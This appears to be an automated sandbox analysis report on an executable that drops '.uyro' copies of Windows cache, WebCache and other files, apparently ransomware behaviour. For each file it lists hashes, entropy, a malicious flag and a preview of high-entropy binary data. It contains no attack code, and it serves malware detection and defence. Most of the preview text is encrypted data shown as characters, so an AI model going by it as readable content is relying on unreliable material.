Size (bytes):	358
Entropy (8bit):	7.2704934323542085
Encrypted:	false
SSDEEP:	6:zc3KOMJR/K/yZoys8FpmS827DUKl86dBauJ5+hQRiHVpOGxntHcii96Z:zcrMJR/dyysimNfc8eBV+hQRgtcii9a
MD5:	10142A9DDE11FC6FB7A0B504C1F545B6
SHA1:	15E5E9A5357299314B704BAEA63504D73607D77C
SHA-256:	9E24146601627C4E9B3E998F51838A55BEBE9B01F86EBFF8D35E1BC03DABE5A7
SHA-512:	F4E73C1634E3A9E5F0F512A37947FEF0EF74A9254A75B41F2708229CBAF0D74350FD455593A4C17C38313ADC0D626E8B39F9609222F11647BB4C024F013DC28E
Malicious:	false
Reputation:	unknown
Preview:	CMMM T...AxgR...p...L.8..m.[. o...3.A,t;...8bx.N9.]`.F.F=.wl$"R.>gE.P...J.u.x.......l.9..epA.8.7>S..~..U...?f.....\.<0.+...>;4R...*...^..:.S..j6.EJ....X...D"..O7...b...'~...T..[c..Q....FL......A...t..~....Nx}...CV.+D.1w`.W6.K......... Y..........NJ.j../...(...2.s...K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_sr.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.271043675308291
Encrypted:	false
SSDEEP:	6:sEO5UAWted5k0lYs5ET+ENCB2UK5Vriu61dJZSv7qr/6AU8iGxntHcii96Z:h8ZWt50+MET+gCARVWNJEYtcii9a
MD5:	BD460F19120619DA6CACA3E30B1A1DBC
SHA1:	5A87E3CD6531057A84DDAA9C8130DFEB2916E884
SHA-256:	8A7A339CB90C17C22A3ADF56847A14314D9A2C3859A6187194829D71F55C3727
SHA-512:	5D3D8EC8AB304268AC84DA1B30695E7B60D5E479C972302B4FBF81B46615646243B4778D7697F8544C6E5DB2F5E068BF1629A02CE35F0DC00514A6FB874B2A19
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...H.Y..z.<...,WX..[....`.Gw.....).HB.^@.[.... ..!.m..8z........wL.._..m.aE5GVM........ '.$.h.!.o....K.Zt.X.iG.&.#..)N...B.d..0.A..*8..[...a..2.A>C..>."S.U..t.E.Y.%M. o.J.es.N1....7..7R.g5A.pg_..Wk..j.p..W..=D:...<...P..\|.....Gf1jP^...J\.M.(%..)...LN..z.....uN^."..K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_wide.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.33103692967462
Encrypted:	false
SSDEEP:	6:wdboLHGlD3nCvPicFgivml8yo5xla2Z/rKX1wD3lldoDf1/9cXzGxntHcii96Z:wdboL43CvPpFHvmuyo5Ta2Z/rKelQSc1
MD5:	4350E8896EE6686EE8F00120A58AC1DA
SHA1:	BC233A916B499FC09CCB04EE151C9AC57A6F3B0A
SHA-256:	4AA1A14BB13C491A9268DA22B3CD298F0F6EB5D388F6F35C190EAEA8DC3F8325
SHA-512:	B2275A2D5F0C58E5E7D242A7ADB00105FF417622635718ED3755FF7D7282048929DD80FAA34C9A79DC0F1CBB783D214ABC1B214135551002AF40A8BCF5436B1E
Malicious:	false
Reputation:	unknown
Preview:	CMMM no.Iu+.g.......R..<0...l.`yn..I?].r~..l.....6........Oc...A._J.BS..@+p.d+...O>..tXA..<....p?...@..@,I....H.../U.s..Vr.z.f......%.Y......^.T.-J...i..8=A.Ln..A...<...t}N..:q<.2[1.'*.M.7=.6..x..fJ....Z..y..S.R.<3S._...k..z.....U.9`}.ya..v.Qc.../...S.:.....~.l.....'CK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_wide_alternate.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.305115012351504
Encrypted:	false
SSDEEP:	6:woMIX2V/qPxJG67giDE0wQ4d03C3TiPjaDGj/zHj8LuX/+e+vBCfCVc3/yzaeq2j:xX2UZJGIAb5cC3TWRrzD8eT0CxOaicY1
MD5:	EBFE73C3750BF6586AA1CF776FE06C9B
SHA1:	053DDCCDF6E0F53A8EB711340D7C6036AB800F35
SHA-256:	1E14DDC5B109357695119CDF5DBBD15B58C9A88953C4252D3B0423D420D4AA48
SHA-512:	595B5DF3FB46A9BACF99A67967AC041DD0B9A61FD4BA297553E70CCE947D45517BF30B059EFD901D7C6B8EB8B28F619C4791160B3D78A8B7B1B881E08BEAF5E2
Malicious:	false
Reputation:	unknown
Preview:	CMMM 4..1..H...s.$..k6.7.indlz.........]..=....Y.N.....'....4..2G...gq;.E....g...!:.....+.......Y.a..I...`U?.M...h]....H.X?_S.B.!7..vjA..>\|c..b.S...S......S.I.eX.......#.#.(...i..b&.Dfa...ae...W...C.z.Q.....%.N..'h.P1.Q.I.........p.c..vJ..3v....^.g.v.>..X-.}....K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_1280.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.161773567163932
Encrypted:	false
SSDEEP:	6:MV2b9E7yzXQRSORc7vTIVIyABYO6H+RJu+srQzTL7odyXicHGxntHcii96Z:ox7yTQRI7hyrOnJu+scfLojRtcii9a
MD5:	CCFAAF594CCB26DC6F7EEC4E12512BBF
SHA1:	FD32216CB7C42E793CD9D71262BFA9BD7B9F4538
SHA-256:	900249490F4E72F38F3F37D5A5E9F774CA2B1FB22D98B4885A904FCCA8CBC1E3
SHA-512:	9699A79B264C2688D23F151D45CEA89063F4BFB61D960A0ED14F43A2526D62D78CC94384C65F0696579690F2E7E27B95AF83DA882BE77EE27D5C7091176E1435
Malicious:	false
Reputation:	unknown
Preview:	CMMM .\|k...#.~..z.4o#.......c.,.$...O+j.36[.....?zt.AX.rs.[7&..sW.. g.]o.Sg.W\|\.g)[...;g}....H...O..k..bMJ..-CO<...#].,y..W.....+.^.z.Z...0..0PP$wn.{..0.YW.[..P1..G.R3..].^/.Vwdz.].....M..z.Of..Z.[......@..P.r2d+..K..@...G`......S6....!#..$k..\|.Ed....B.....G..P.[..K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_1920.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.243020798377618
Encrypted:	false
SSDEEP:	6:sOwhp8KVBSIt/Ox3o0hdYhPjixD0u7hHjgB0w23AliGxntHcii96Z:ghp8Oox3ogYhOmj0w236dtcii9a
MD5:	72722C2FC3BD841C0ED68BF4EB4EBC19
SHA1:	BF6EDBEED780A746BC410E44FBF2FE3DCE3DBB7E
SHA-256:	6214F15603C993CB6AD02241AC8337F33320BBF4922012F675A7871ACE67DCF1
SHA-512:	A3E54C54362DAA6B744DE9BA817FC3B613CF5288E928C52641A9BF8D6362C3F161552F6C5FB8BABC2DE27F00092D04979CF197DF34E1EF00C74656C16A9F2359
Malicious:	false
Reputation:	unknown
Preview:	CMMM (.n..!L....l.....T.5l.y`..,#........&..G.k.62.C(YB.U.pH..X..jL5a.eg..<bc.......A.l.6..q.i......v$.PZ-..r.G\.f./.......r..........y[.Z...^p.!9..W.uY.\V._Ty:\|....;#5..~\."c#..:8Z.p....U..?.?.bdT......@...i..\|i.".K...AM.c.p:'kF..q..R.GL[..0G.b..m...y.H...\|V...}..^...y.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_2560.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.316943685100272
Encrypted:	false
SSDEEP:	6:sovlbj5skg2OqSDZXDWnz7+RyAAD8n9ZmjXU4c8OhynUyTOFE68AiGxntHcii96Z:Dj5skupZXKuR9Y8n9SU4why8i68Adtcq
MD5:	EB88C3AA5DFDC1B9B8B294FD2B412AE7
SHA1:	34639333611AEBFDC15F9B63E715288B514915F1
SHA-256:	18D7AFFE2130C51F52AE8795ECC4FB62A41ECEC6C454D17F9A24F13192729AA9
SHA-512:	1F889C59507C36C052B421CC7470F2F01B1EC45B82E1411057F62591187082EB4834D061A65065067C985769B69BC4F9577E5D4AE2CA718AFD29152250531BB9
Malicious:	false
Reputation:	unknown
Preview:	CMMM gz(.......n.Eo!...p..:......}.....S..b.d.........,.l....AEe......6.S.swrf..oc..[yF.....!J]...3o2.y......0......H.r...2........ ....&...l......t......u.......b....2.]..A^Br.s.3*..x/..<w,....-.A.x.NR2%..8/.C...q.....X.V.R\.I..5-..q...5..l..+....".mQ..`..Q.}...JM....K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_768.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.339075590452771
Encrypted:	false
SSDEEP:	6:ujxW6Q24ze9iGJ7sZmqv/r6SGmAmvohtI+paziGxntHcii96Z:ujw6YAiGJBqmS3ovI+patcii9a
MD5:	A30186DB9364D1F38E7F189AC9D9AAE2
SHA1:	B2467C08EF20AA767DDD79A9FE82FE61B63875DB
SHA-256:	1E844D72B6F3D7D7413CA96D8A6A1C6870DE77A8787CB54FF62E2CE3B91ABD25
SHA-512:	A82124EC99444E6976AA70246DF7800283465036BE0390FB272D0C9CAC891A9B69026E900A9125E0B088F88F441FEB3D75BF630796CD1B75E3A4A425971236B7
Malicious:	false
Reputation:	unknown
Preview:	CMMM ..W...r.0'R7 .....V`..!........[...T.W..F.a....b.......Ac...4..Q.v.<..57..(.....%.,.nEk..?.}_.jV...,..T.@of^..j!.A,.M....1.h..6.<.]......4...................m'..b.M..`4HS$d<.((..ZB.y.....v?..........p$!.!.N......q.........o...QC./Y~...y:.%....-..nq7.R..k3._..'K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_custom_stream.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.223017280336472
Encrypted:	false
SSDEEP:	6:8Cutx4VBudlhy9dlMAZ8fSxZEuzJTtFY+NIGT/BKmqEHdOGxntHcii96Z:8Fts7H+W5zJjY+NpT/T3Htcii9a
MD5:	BB4394C8A9F261990BD90095FD981088
SHA1:	D07E1B2A746CF3E0B3AEEA375AC9C4738097354C
SHA-256:	9702F2801C6FD49662FC986118C526692BD367A6D52C9A7626F9DC857EBBF830
SHA-512:	286D50BDBE7763841F4C8E829A47AA361DAD529C5AB0CB9C25CD3E8B4412F91573F53F18E8614756DB3150D96BC169CB951FA2E4FD9433A06CAF2DF6F37B8950
Malicious:	false
Reputation:	unknown
Preview:	CMMM ..J....ut83.yG....g..t....\|...g....\|_R...D.M..p..[.......N.a....c...z.K..}..Q.u(........@...XZ..%=..8NX..Kn.[....q?..3......#.Go.s.....y^..J."w...O\.xq4u.l.J.\.7.....N.p;..AaM...,6..RoY)....R5..ik..l4a5...y;....B.=.tF.q....&].......g....3Da..2Y.-"A..".....G...@\|.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_exif.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.2158799715042266
Encrypted:	false
SSDEEP:	6:DVb8Kx5zmTpvXmjRPpykVzv6pjsuhSInk4BB3BZDURWnjfHH/VYf/OGxntHcii9a:9pxlePmFPge6hsABZIRyjFy/Rtcii9a
MD5:	7F0E3FF1C6EA95C6BE3F4CD72EE4954F
SHA1:	C20F06853D333F7706EADC649BB0BCA7A92AB4E6
SHA-256:	BEFBF877E8FAB55C52BB62CF5202ADB447A0F5E8D506336418197EF9926CF1F6
SHA-512:	76312A89785F9D7C5BB60E91891C60BB27E4DE55D7F538100A235B2281D93B8903044737385743AEC8F67D68257248A624C1E2CC4A3B4439819368EC71A93FB5
Malicious:	false
Reputation:	unknown
Preview:	CMMM .?......C.y.ff.Y.v8.v..!..P........Pt....(..<^.y.MBKv(t...Kc.V..B....>'Q..jr.56Fr:.........Y..F?.B..y..}....?z...bY.. F.....Z@=M...v.gm.`..(W.N.t...#..6.._E.......g.^a1B..r...4._....I..Z...Am...........c..N.u......\|.M......W~.buE.Q.A.U...:.o..`..p...Trx.z_...Yz..Eu..K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_sr.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.2502556879468445
Encrypted:	false
SSDEEP:	6:X2nlaxV3mL2eEpnHm2zPfiHhINxnJ4R4myWSPMVnP4fDxkZjr5nuDGxntHcii96Z:AlvEpnGo+QxC2xWSEVns8r5Rtcii9a
MD5:	63DE5FAD4B77A4A3D11E6E283AA1AD0D
SHA1:	453CE739179B7C63D4DA40F264337645329DEB07
SHA-256:	B41F453CC07E4BF95B8B087D343B092BDF6AFBACF14C47034AD4F44A1D00B02F
SHA-512:	6CFF8B0BCE7F9C10CCBE1B95DC734AD55141F2BFAB28E8E04CD5956F05925C70DB288EB056CC5F0E2A8951CB615767179C7E0DE8C60AC14BB89FF79B84D5D1AB
Malicious:	false
Reputation:	unknown
Preview:	CMMM =..M..S@.~@@..\|$yG.L]1.#...u.c_.=6. X+..{.g...6_.U....o..3%YW.LP.h/U...x........X3X.2....L..OCS$.n\|.<-..<....T`-.z.......R.{W........\|....].H:/.I1.+.8h..U...!R..D...L.!........M@&..i....$.......`9...~(.......:.'..j..Qep.(....g.....~.:.dz=tx..=.j\...k~B\|Y..A.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_wide.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.331497256591886
Encrypted:	false
SSDEEP:	6:QDGw2K5H9jc76GrXCHziiJbWesB0zrnHUWX2UE6l0vDMvRL94GxntHcii96Z:QDGE55srXhM205fl0vDMvZptcii9a
MD5:	6940F11FD96771DEC9FF1AC57E6703D5
SHA1:	4EF64E175B8EAED160F7A4CEDF98FF5AB6D7BCB5
SHA-256:	122105BE90DA8732696CA8E1987A55E66C5E400566F54814ACF93AD3AC466390
SHA-512:	8A285F40E32D6CA7F40ECEA5DCA953EBB47108795E99579BA108C3D3968961FCBC53FC4C1677A8D19AA495AD4396BDDCE3923062D444335CF7D1126288D02279
Malicious:	false
Reputation:	unknown
Preview:	CMMM ....8.V...78ya#7A..@ M%.4D."~F...e3..n(r^....k.^.N.%c...p^......y.....F.Y..D]..r..N...d.T.4.s.i.a.O...a-..ab.H...b..&...9.q.,.?.......!..\.[&.J...$....e.....Wf.....L..Z.....VCO.0.V:..z....8+..#p...'.A.P...5.!........^.......H..<.$'OX`MwQ....i^d-.@t....$_..5gK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\Windows\Explorer\thumbcache_wide_alternate.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.295687706121399
Encrypted:	false
SSDEEP:	6:TPi5CIqmF3SdVTx35f41xVQNUW77cjU+M3/RYGBRkcFqY7jWoSFDDGxntHcii96Z:T6aE3ktVoo7YA+MpY0ScFZ2gtcii9a
MD5:	2C106AF5BCE28CEE05D4309A36CAF64E
SHA1:	79DB2D4E4778BE69E47506234817D514905C38A0
SHA-256:	03508A00BEF1CC40C9641F8DDA20AFEE1DD3ADB846FD3DEFB75063468C177C5E
SHA-512:	94970B1E11A2C9A7EC9B7D422B924986DE085289CE916C4EB5625D4504A4C2D1359E347D6D28FD007F82982B10F9F076344E07C364B9376F3C8F703EE1725C5D
Malicious:	false
Reputation:	unknown
Preview:	CMMM ..7.F.!.J.$.'.w/.Cr^a_.Yg...#......QS.~\...`.4.ah.'D..".P2...M.X.?.........AE...]m...h.<.rp.Qx.9e....;.....W.+..:.h.9h...B..)#s....$..y"!...o.OQ^......Vn"...X..9>......Frf..U.*~....r.H>....[T/..%p. ..g.U...m.CD.....J....;o.98yp._S.%.]M:..~?.l}..Fa......0..d..UHK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\Windows\Shell\DefaultLayouts.xml.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	118275
Entropy (8bit):	7.9983377415289985
Encrypted:	true
SSDEEP:	3072:LQPsKwLKAycWXYwhxaUNXDqTPMuEkefOId:e7ncOdxDqTPWkefX
MD5:	493483A03D007032627929BA2491C51B
SHA1:	01C531AA85C6DE05B7A47C33B2BE87EA1C17DF15
SHA-256:	B818F7D64FD197F88E4969A006216746A8434966607271EC184DD92C5BA1A792
SHA-512:	D29EEF050830B4441E6F77A84CB56D2D95F27675499E6F5D9852A7D23F0A71652C42492C7587B4CA8E9862D5CC690392904D0C9E37718ED90EAD62A90461CBA0
Malicious:	true
Reputation:	unknown
Preview:	<?xml.x..I.u.\|.\.e...Z......-L..b...b...p.....\..bq......\|.H....l.X...m.2...N.6.T.)F.>.bL.y./.C....h..e).....LR......S..0....`.v.......y...cI..._..YU8.f.1..<...n./...^q.1......i.^!N,..C.\.v.2pE........$....p?....q.H[.m...A".Xh&qk.....h.P.i.k#Zj.j..b.W.q.P.yS..XXv..N.GA....P ..A.s.).e.U.......`.S}{.U/.....VU..v........:{[.hxb...l%..#...xY.m.5~.uD.I...6>.wL..$."....-.0a..2....`]....L.:....Q<EC.l-..M...=..]F..uy?K.:..P...N..=....u.....%.......H.!....\r.4..%0..}...........c+.t..k..<...B.o.tXFP+.[..`sP..}5..+!..qg..~.......+{..9.v......;.F.0F-.U......_.l+x........-.#4j....n..d......;.O_\le@~.....V.32........4..\....].9.. ..8..k.jA....6..../-.........;P..r....x.....D..1.=.&W.'G.f!-."6..{E...z........7...A....d..W.....l.... .{....,..........4...S/N...mv...QD..EHH..V.%7.Q<...U1......v.n+r.o..Y<'Y.....or.:p.O/.hIL.....;....$....w........@....}.._....L\|sy..J.'..gD....[i...z...'.^.,..)"..`.D@E..Q.i{]p.....[.....s[..g..^j.].p...v.....u.90N

C:\Users\user\Local Settings\Microsoft\Windows\UPPS\UPPS.bin.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	PDP-11 overlaid separate executable not stripped
Category:	dropped
Size (bytes):	16482
Entropy (8bit):	7.988001103115078
Encrypted:	false
SSDEEP:	384:EbMrMH3FM/c/vORqoPapyiOPgLjI2LjCm4bna2:EtV9/vkPapoIXIq4Lh
MD5:	3D0B3F7EF01683F8711127C691E2F80E
SHA1:	BD6629FD04B17668AC43BBD24ECBFDBC0DC5A05F
SHA-256:	5D5B670DB7DD5AFCBF0FAF90E5F332A56C64A6B7462DC474533C0E3EA6F01558
SHA-512:	A4665A1A2C3C6751BECC92C4AA415DCFDD097D4269936A987BF6ACF17C7A5609548A2890997E4B3E74F27FA4AE151E12001CF4B396120E2FA75E6F7C388C9FB0
Malicious:	true
Reputation:	unknown
Preview:	......,.I@..A#...4.\ ...!u.a5Ka...,m;.)N.....G......V?..W....9.,.Q...[..;%\|G..T.d...G#.N[...0.......X.^.kS.G...^..m..J.....B.w.!br..g..Hj...i..N..`...BuG.C.../.H......'.z..Z.j..j....d.\....y4...........K...+ZG<.@Y..i...H^.(#..B.?..........H...>GJ.g8.5.2....... ..[b.......a........Iq`M.....M.R.&...5<..... .4...x'"m.w4L.....G...<K.\|XV.....3C.%.w..CAt..S.ip.7...f. .=..![.w.Xu."......Bk.PlZi&.b..n<R..m.1.cc$..(..%-..6..a.t...+.......F...n.-g>vf=.w..`~.dn..p7.p/!..z.....)=..{.-&.QO.x.\|.V..<.@K.}.BJM-....... ......".s.WA......rz.U.HH/'...........S(..rl.....:...N.j.....@.C...^.]........s.^......M.D...{........[...;.E'M9.z..QI..........<]$.........2./Y.Z.h..l........<...M.x..9R...,.R..+.....H..s.a...E.oId.-..,.N.G<^..g#..sp.Rz.....v.=\~qb...A.^..t.....$H.Q....mzu....,>k..Bn..j..X.........\|>.}.%..bMc..,MvF.x^..k..!...$N...=nQ....R.@.+/..KCy^...S..#*^0C.?...-0......:.2.[.b.K......k...oC.d7..J..\|.{.....W.....O;:J.nDgfX?y#.......D..+...!T..\|.n...\|n

C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V01.chk.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.977603612155621
Encrypted:	false
SSDEEP:	192:BppZXsg6URBs0FsUWJQlmpygh/e2zrI5lTWBJHCRcGG9cXXs:8g62B27ogs2voN4uc9cXXs
MD5:	827926454A6FC2C47E7CBEB700BC4BE4
SHA1:	663A5ED72BF50FAB69490239CEF97CCAFC9E9D00
SHA-256:	46C8B13BF8F28BDF71E1ECF7BBAE98BF8FDE655D365F9CB9415F80FBA2165D55
SHA-512:	EC6E556EA6C2D43FE81C5C8988197D97873F3F6E5FC4F7D3A6E549B813623CE915FCB40E9C557D820A16EEEC2EE018A74B167233A530BF0649AE7F671AF7F075
Malicious:	false
Reputation:	unknown
Preview:	..r].......D.......hc...a......mR.0.Z....%[...Yq...`).U...A".-.Sa.,..O. g,.m...d........mz.5..`.b>~....C..K....=..v...J:........x!7..G.i3!%...$.Ry..'l.}'r.w<..D....#P.}..o...7Y.."c..<.J\.yU... .F......h.nh2....-. #.Ea{T..j.a.Ok..........UX ...j...UxlHm..vj....>T........vu..<...........`........lFN.......W...C@^.).fs......t.`.r..;.........}n....\|5>.m.%........d..c...NRA..;e.w.j....h...K.i#..QBL..6..}MD....Y.. .OM.S..$~.6.(..T..~.j.~...\.C..9..U\|..2oC.z..7...n.t^L.....&.d..=53.]....s.....#.(.v...b..n...skL.....'.@..4Z.J......^....j.S...p`...I...\|=..n.u^.cL]2].t.Hq.@.wmp)..Z.....5.... ..:...^..Y$u....}..e..$...Z...K.)..-.@{.N.{....^p.CS.#) =.Qw..1y.x.^..#.y..\3..G....lb_n~(...f'...,....;...t.dfJEhb.E.:F....D.S%x..fN.k..\7... ?Y..Rra.K..I..y...~..Xa.S...t....~.GN.: ..1. ys........M.7....u. .w.2sHl.&.x\|..5. ....5.l..<tj.u.........qca...<.nld...8.,0.......9.M..E......,.iS[...&.......wg.87N=........~.6.H7...e&f..%....-...8 Rg....^..+P....

C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V0100009.log.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	524622
Entropy (8bit):	5.428239273896568
Encrypted:	false
SSDEEP:	6144:VmEu1rJ82+ocGGy4ufJ3zV46FNfVZHKjvoKnaTXIiSICefMHMD/:VmBr7+kkux3ffejQr7
MD5:	9476CD82E7FEAE1BF22D0E2A0FCFCCA9
SHA1:	3A150C4A0F812432674282248D50C882F6ADD7B5
SHA-256:	6DA12575AA3CDFBCEF460DA957D8302F18F4F5AD6A336FD75871A16CA17E5D71
SHA-512:	72EC06E6EC08AF6561E0AC1D1A0B39AD283A57D321BFFB94D4586500E568F0A2FE11398AC51BADAAE7D9245C8E5B889760262C89168F09CC5F301DC39963C153
Malicious:	false
Reputation:	unknown
Preview:	...:.P.+v...p.Rz..4..98....=.?......m`.g....n...\-R.k....=:.........0...../..4..{.x....6R.bx.uG)$.^..\|wy....&.F.y\|...F..n.....".o].+e.y.FM..'\|$......Z....u.o..E...FkK}.+.o.....cm.[..C...i.U..7hnG/...U...%...Q...p1.n.....H.......p$~e.EN..n(.>.4..!..SPC.3...q.t..cJJq.U.A..9.W.hJ. W. <.......>...$.F....e(.LX&...d...1\.E.M.."..86.....f5o...N=.Y.2.^.b...;[)m..&h......uOB...3J@........&M..?....S./0O\r..(......N.1.]....z.1..T.k....V...b.e..+ ....).. .S..\|....I..p....'...I..a..&2;...+.....d...~EV.c..jT"xA..o........l..n..,=...Z...c#t...I.s.dR.V.)0..3MZf..P...k."..-#O..'...v.........P.1.fA\.r.,<..d....t...~..f...2..Z.W....N..,(.nc.v....O\D.>T.1Fv5`@c!.\...r......Jnf...L%."...U..._...."!.!"..+........>..W.Xv...w(fY..j...?b..E..q......9....B.T.nWqh.p..=...e....M..w'.9.p..8W.lvO....rK....{W.0....#.@.....(.=&}...L.. ..(.X...K....V.o.....@...&.h.BL..o.P!.....;..9...........2.._.D...9......M..lGj.....r....,Q....5.Il&e......NE..).....V[.p

C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V010000A.log.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	524622
Entropy (8bit):	5.852598956637424
Encrypted:	false
SSDEEP:	6144:Kz6EUKs9CqgSFp3DzYZk3LcYpHDCOVx1COTvBFUyMquiyMchBg:vEuFLftbeOYyMquK
MD5:	9350BFA910A7A42A236BE9C1C60329F4
SHA1:	C0B0E5D44B34C629076E5BC730EB24BA34CF44AF
SHA-256:	973DB22AFE6E18830352F845FDF72B18BC9BE577206E8CD3FD7243C03D6FFC50
SHA-512:	C7CDFC332BFC41DCD58CB77BC1598CEF07BFC8B122834EAFF0B119DD39908FA5E5F4637413DCDAF4CD5D19939DE8551A5CA3D8E469C3EB4676940D67814D73E3
Malicious:	false
Reputation:	unknown
Preview:	.....2..../....v.`.KT.0s....(.g........_........V...;^>=...V....G.ov...(.7..%E.J...+qXq.mH.[.._f....M....\......+...R......ko.......g.........0.=`..........e8....b#..ay....D..4.Z...2...k.^G..V.?..%q8........`{.V.k........k......r1.#....J4.g9u!5.Tn.0.U.7%..T.Ry.X.0.cm.r.k.+6#y..x..:......4..3."..7.;e....AbyJr..^..._.....8.[...O`.6.+i #.5..Y)Y...'....`!.<....@..@1.L...G..d.1...-.@h....D ..9_......].........m./.A.^........\|.\._.3i.,p..i.O`.....t..(.,.....!H)...$F....c.~....=...<..Q%.......:.....M/\|`..\|y....\...q......I.7..!'..>.f*H...H.B..j.S;.L}...E..z..,...R..F.}.R70=....s.[.r..x.\|/.wOb.M.T}...<.9.pk.ak7Xm"..p....pt...{..M.#.@.EI..z..2..$..Y......@.pN..p8....."f<...T....%.Fq,,_=..F...X..s.A\..BuS.l.....o.....X..U.n.:.g....xw_-...e.\..M..^P...a.J.e...d.f.7....t.. w..u..r..i....B.U..F....[.M.uH....M...tQC...Tx;.d.F...@^.<......Y..$....\P.$.....?p.R.`.#m.`i.gS..........1K.......A...7K..d...4<...RE.L.].../.d.....t..e..J .>...9>,b...

C:\Users\user\Local Settings\Microsoft\Windows\WebCache\V010000B.log.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	524622
Entropy (8bit):	6.162587182034906
Encrypted:	false
SSDEEP:	6144:837y5IT4QtSPThOa4MXkhzaNlhJ8RBGE3BVVLZt1o:83wIT4QswaSh+b78BVPo
MD5:	F7696017A12CAD097855210BAB257AB9
SHA1:	FB6B75586A36FFAAC840A8BE20F554CA92C4E01D
SHA-256:	3C6F57F467580F7702790256D6CB18DDE49B125E6451900F00F334742A50A899
SHA-512:	6126795E706110CCBC5985789971D6B854CAD08F4D8580EF316305AF338C3F8CD78EFDB27062B087010CBBE8C7A8ADA84C6729EABB511EDBCC2FAD52C822EE81
Malicious:	false
Reputation:	unknown
